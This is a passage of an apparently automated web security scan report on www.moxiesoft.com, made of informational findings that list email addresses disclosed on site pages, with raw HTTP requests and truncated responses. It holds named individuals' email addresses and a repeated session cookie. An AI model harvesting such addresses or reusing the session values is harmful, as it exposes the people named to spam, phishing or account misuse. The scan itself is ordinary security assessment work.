21.126. http://www.moxiesoft.com/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/search.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

21.127. http://www.moxiesoft.com/sitemap.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/sitemap.aspx

Issue detail

The following email addresses were disclosed in the response:

info@moxiesoft.com
webteam@moxiesoft.com

Request

GET /sitemap.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:05:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a href="http://webteam@moxiesoft.com">
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.128. http://www.moxiesoft.com/solutions/cust-engagement-spaces.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/solutions/cust-engagement-spaces.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.129. http://www.moxiesoft.com/solutions/emp-engagement-spaces.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/solutions/emp-engagement-spaces.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

21.130. http://www.moxiesoft.com/solutions/spaces-solutions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/solutions/spaces-solutions.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /solutions/spaces-solutions.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:02:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.131. http://www.moxiesoft.com/tal_about/aboutus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_about/aboutus.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/aboutus.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.132. http://www.moxiesoft.com/tal_about/careers.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_about/careers.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/careers.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.133. http://www.moxiesoft.com/tal_about/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_about/contact.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.134. http://www.moxiesoft.com/tal_about/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_about/default.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/default.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.135. http://www.moxiesoft.com/tal_about/directors.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_about/directors.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/directors.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.136. http://www.moxiesoft.com/tal_about/legal.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_about/legal.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/legal.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:02:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.137. http://www.moxiesoft.com/tal_about/management.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_about/management.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/management.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.138. http://www.moxiesoft.com/tal_about/partners/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_about/partners/default.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/partners/default.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:02:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.139. http://www.moxiesoft.com/tal_about/terms-of-use.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_about/terms-of-use.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/terms-of-use.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.140. http://www.moxiesoft.com/tal_lp/campaign.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_lp/campaign.aspx

Issue detail

The following email addresses were disclosed in the response:

gsmith@ngenera.com
info@moxiesoft.com

Request

Response

21.141. http://www.moxiesoft.com/tal_lp/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_lp/default.aspx

Issue detail

The following email addresses were disclosed in the response:

cimleads@ngenera.com
info@moxiesoft.com

Request

Response

21.142. http://www.moxiesoft.com/tal_news/awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/awards.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_news/awards.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.143. http://www.moxiesoft.com/tal_news/customers.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/customers.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_news/customers.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.144. http://www.moxiesoft.com/tal_news/events-resources.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/events-resources.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_news/events-resources.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.145. http://www.moxiesoft.com/tal_news/press_release.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/press_release.aspx

Issue detail

The following email addresses were disclosed in the response:

info@moxiesoft.com
kristi@kilpatrick-pr.com

Request

Response

21.146. http://www.moxiesoft.com/tal_news/press_release.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/press_release.aspx

Issue detail

The following email addresses were disclosed in the response:

areichert@moxiesoft.com
areichert@ngenera.com
info@moxiesoft.com

Request

GET /tal_news/press_release.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="areichert@ngenera.com" href="mailto:areichert@moxiesoft.com">areichert@moxiesoft.com</a>
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.147. http://www.moxiesoft.com/tal_news/press_room.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/press_room.aspx

Issue detail

The following email addresses were disclosed in the response:

areichert@moxiesoft.com
areichert@ngenera.com
info@moxiesoft.com

Request

GET /tal_news/press_room.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="areichert@ngenera.com" href="mailto:areichert@moxiesoft.com">areichert@moxiesoft.com</a>
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.148. http://www.moxiesoft.com/tal_news/webinars/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/webinars/default.aspx

Issue detail

The following email addresses were disclosed in the response:

cimleads@ngenera.com
info@moxiesoft.com
tpiccione@moxiesoft.com

Request

Response

21.149. http://www.moxiesoft.com/tal_news/webinars_events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/webinars_events.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_news/webinars_events.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28782

